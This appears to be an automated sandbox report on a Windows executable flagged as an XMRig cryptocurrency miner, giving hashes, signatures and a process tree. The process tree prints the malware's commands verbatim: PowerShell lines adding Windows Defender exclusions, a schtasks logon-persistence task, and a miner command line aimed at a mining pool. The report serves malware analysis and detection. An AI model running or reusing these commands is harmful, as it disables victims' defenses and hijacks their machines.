Overview

overview

10

Static

static

3

ee0752e89d...44.exe

windows7-x64

10

ee0752e89d...44.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    106s
  • max time network
    115s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-11-2024 22:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe

  • Size

    2.1MB

  • MD5

    9bc40b0890e81c429b325727e5ba5893

  • SHA1

    a7561d62b00391fc996ee244bba8069ed3dd6bdb

  • SHA256

    ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344

  • SHA512

    f08fc59295e0eb348c0eec1e2670b773001be7797832df829fa42c8cbeebfb5e0e4195b8bfb962c6143ceac29e7720f753993b0b3689678ef913a0de0aec5d7f

  • SSDEEP

    49152:GvQUiuvKem70245BBqhM85yYESmScKCgwm8f63tk5LwjVg:GvQUhkz6HG5pESmSN9A4k9KVg

Score
10/10
xmrigexecutionminer

Malware Config

Signatures

  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 7 IoCs
    miner
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Cryptocurrency Miner

    Makes network request to known mining pool URL.

    miner
  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe
    "C:\Users\Admin\AppData\Local\Temp\ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4108
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2876
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1376
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3428
      • C:\Windows\System32\cmd.exe
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3244
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1196
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3120
        • C:\Users\Admin\AppData\Local\Temp\services64.exe
          C:\Users\Admin\AppData\Local\Temp\services64.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:768
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
            5⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4012
            • C:\Windows\System32\cmd.exe
              "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2536
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4524
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4396
            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:448
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\conhost.exe" "/sihost64"
                7⤵
                  PID:4500
              • C:\Windows\explorer.exe
                C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=20 --cinit-idle-wait=5 --cinit-idle-cpu=80
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4732

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
      Filesize

      539B

      MD5

      b245679121623b152bea5562c173ba11

      SHA1

      47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

      SHA256

      73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

      SHA512

      75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      2979eabc783eaca50de7be23dd4eafcf

      SHA1

      d709ce5f3a06b7958a67e20870bfd95b83cad2ea

      SHA256

      006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903

      SHA512

      92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      dd1d0b083fedf44b482a028fb70b96e8

      SHA1

      dc9c027937c9f6d52268a1504cbae42a39c8d36a

      SHA256

      cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c

      SHA512

      96bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      5fbb56518e82d1b1e5ef6be3b6693880

      SHA1

      4e7671d0193b6f640d81b3fb91ac17ca67e0632b

      SHA256

      760d5623e712e53485c80330b3e2567577ffcf9397a94c3085bd1999f4650a40

      SHA512

      ff2fff83f094820da4157c907be06039dcc58b1a23e867ba58c0c3f40d8bbd90022161dc3d77c082a765f7f4104f683be995b994183d1899c73bd9131fe614d1

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qfmiwhls.3ak.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\services64.exe
      Filesize

      2.1MB

      MD5

      9bc40b0890e81c429b325727e5ba5893

      SHA1

      a7561d62b00391fc996ee244bba8069ed3dd6bdb

      SHA256

      ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344

      SHA512

      f08fc59295e0eb348c0eec1e2670b773001be7797832df829fa42c8cbeebfb5e0e4195b8bfb962c6143ceac29e7720f753993b0b3689678ef913a0de0aec5d7f

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      Filesize

      32KB

      MD5

      703bba1d6c5595dcd7cbc5e34ed2ae33

      SHA1

      4c4e251addaf23f55350a8f1227d239d12aba92e

      SHA256

      28f55ece940bf306a301835f5500498f5ef552d0f57ca988b01ee0b584128619

      SHA512

      3c94a83a1f77b04eb91fbad142b965ca5c3bf6073e67314272aece6cd347b53f340f26aad34ba80ba65b26e186539e0327e6acd429ab6540d3eeada70199863a

      Download Submit

    • memory/1376-12-0x000001830D590000-0x000001830D5B2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1376-17-0x00007FFD2EAD0000-0x00007FFD2F591000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1376-18-0x00007FFD2EAD0000-0x00007FFD2F591000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1376-19-0x00007FFD2EAD0000-0x00007FFD2F591000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1376-22-0x00007FFD2EAD0000-0x00007FFD2F591000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2876-36-0x00007FFD2EAD0000-0x00007FFD2F591000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2876-3-0x000002004FDE0000-0x000002004FDF2000-memory.dmp

      Filesize

      72KB

      Download

    • memory/2876-35-0x00007FFD2EAD3000-0x00007FFD2EAD5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2876-0-0x000002004DD60000-0x000002004DF80000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/2876-41-0x00007FFD2EAD0000-0x00007FFD2F591000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2876-5-0x00007FFD2EAD0000-0x00007FFD2F591000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2876-4-0x00007FFD2EAD0000-0x00007FFD2F591000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2876-6-0x00007FFD2EAD0000-0x00007FFD2F591000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2876-2-0x0000020068860000-0x0000020068A80000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/2876-1-0x00007FFD2EAD3000-0x00007FFD2EAD5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4396-87-0x0000023F5F370000-0x0000023F5F58C000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/4500-89-0x000002867F3E0000-0x000002867F3E6000-memory.dmp

      Filesize

      24KB

      Download

    • memory/4500-88-0x000002867EBC0000-0x000002867EBC6000-memory.dmp

      Filesize

      24KB

      Download

    • memory/4524-66-0x000002BCC2A80000-0x000002BCC2C9C000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/4732-79-0x0000000002720000-0x0000000002740000-memory.dmp

      Filesize

      128KB

      Download

    • memory/4732-82-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/4732-85-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/4732-83-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/4732-84-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/4732-81-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/4732-77-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/4732-78-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download